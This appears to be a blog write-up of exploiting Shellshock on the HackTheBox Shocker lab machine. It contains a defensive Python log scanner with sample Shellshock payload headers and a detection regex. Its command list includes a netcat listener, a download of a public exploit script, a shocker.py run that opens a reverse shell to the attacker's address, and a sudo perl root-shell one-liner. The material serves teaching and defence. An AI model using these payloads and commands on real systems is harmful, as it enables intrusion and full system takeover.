What Is Shellshock?

Shellshock was a major vulnerability that affected versions of Bash (the Bourne-Again Shell) before version 4.3. Bash is the command-line interface that many of us use to interact with Linux and Mac systems. The bug was particularly dangerous on web servers running Apache with CGI-bin scripts and on systems using OpenSSH.

The core of the problem was that an attacker could trick a vulnerable version of Bash into running arbitrary commands. In the context of a web server, this meant an attacker could send a specially crafted HTTP request and get the server to execute commands, leading to a full compromise.

The best way to fix this, of course, is to update Bash to a patched version and to be very careful about what scripts are running in your CGI-bin directory.
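As an added example (not part of the original post), the following Python scans Apache access-log lines for the Shellshock prefix in the request headers that mod_cgi hands to a CGI script's environment. The log lines are constructed; the addresses and the cgi-bin path are the ones used in the walkthrough.

```python
import re
from typing import Dict, List

# Constructed Apache combined-format access log lines (sample data, not from
# the original post). Lines 2 and 3 carry the Shellshock function-definition
# prefix in User-Agent and Referer; mod_cgi exports those headers to the CGI
# script's environment as HTTP_USER_AGENT and HTTP_REFERER, which is how a
# crafted request reaches a vulnerable Bash.
SAMPLE_LOG = """\
10.10.14.7 - - [01/Jan/2024:12:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.88.1"
10.10.14.7 - - [01/Jan/2024:12:00:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "-" "() { :; }; /bin/bash -c 'id'"
10.10.14.7 - - [01/Jan/2024:12:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "(){ :;}; echo x" "Mozilla/5.0"
10.10.14.7 - - [01/Jan/2024:12:00:12 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Vulnerable Bash treated an exported value starting with "() {" as a function
# definition and ran whatever followed the closing brace. Matching loosely on
# whitespace also catches scanner variants a strict match would miss.
SHOCK_RE = re.compile(r"\(\)\s*\{")

def parse_line(line: str) -> Dict[str, str]:
    """Split one combined-format line into fields; {} if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}

def find_shellshock(log_text: str) -> List[Dict[str, object]]:
    """One finding per line whose User-Agent or Referer carries the prefix.
    'cgi' marks requests aimed at /cgi-bin/, where the header actually reaches
    a shell; hits on static paths are usually blind scanning."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for header in ("ua", "referer"):
            if SHOCK_RE.search(rec[header]):
                findings.append({"ip": rec["ip"], "status": rec["status"],
                                 "path": rec["path"], "header": header,
                                 "cgi": rec["path"].startswith("/cgi-bin/"),
                                 "value": rec[header]})
                break
    return findings

if __name__ == "__main__":
    for f in find_shellshock(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} via {f['header']}: {f['value']!r}")
```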

In this post, we cover the demonstration, exploitation and mitigation of the Shellshock vulnerability, using the HackTheBox Shocker lab machine.

The Live Hack

For my demonstration, I’m targeting a machine that’s running an Apache web server.

  1. Reconnaissance: I start with an Nmap scan and find that ports 80 (for HTTP) and 2222 (for SSH) are open. I then use a tool called dirb to look for hidden directories on the web server and quickly find a cgi-bin directory. A further search inside that directory reveals a Bash script named user.sh.
  2. Proof of Concept: Now that I have a target script, I need to see if it’s vulnerable. I use the curl command to send a specially crafted HTTP request to the script. My payload is a simple ping command that tries to ping my own machine. I fire up tcpdump on my end to listen for the incoming ping, but it doesn’t work.
  3. Getting a Shell: Since the ping didn’t work, I switch to a more direct approach: a reverse shell. I craft a new curl command, but this time, the payload is a one-liner that will create a reverse shell connection back to my machine. I start a Netcat listener on my end, send the request, and just like that, I get a shell on the target machine!
  4. Trying Another Way: Just to show there’s more than one way to do this, I also use a Python script called shocker.py that automates the Shellshock exploit. I download the script, run it with the target’s information, and get a second reverse shell.
  5. Privilege Escalation: Now that I’m in, I need to get root access. I run sudo -l to see what commands I can run with sudo. It turns out I can run perl as the root user without a password. This is a huge win! I use a simple perl command to execute a shell, and because I ran it with sudo, the shell I get is a root shell. 👑

From there, I can navigate to the /root directory and grab the final flag.

Technical Commands

Here’s a list of the commands I used in my terminal to exploit Shellshock and own this machine:

  • Directory Brute-forcing:
    • dirb http://10.10.10.56
    • dirb http://10.10.10.56/cgi-bin/ -X .py,.sh
  • Interacting with the Web Server:
    • curl http://10.10.10.56/cgi-bin/user.sh
  • Network Utilities:
    • ifconfig
    • sudo tcpdump -i tun0
    • nc -lvp 4545
  • Exploitation Scripts:
    • wget https://raw.githubusercontent.com/opsxcq/exploit-bashbug/master/shocker.py
    • python shocker.py -H 10.10.10.56 -u /cgi-bin/user.sh -l 10.10.14.7 -p 4546
  • Privilege Escalation:
    • id
    • sudo -l
    • sudo perl -e 'exec "/bin/bash";'
  • Basic Navigation:
    • ls, pwd, cd /root

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.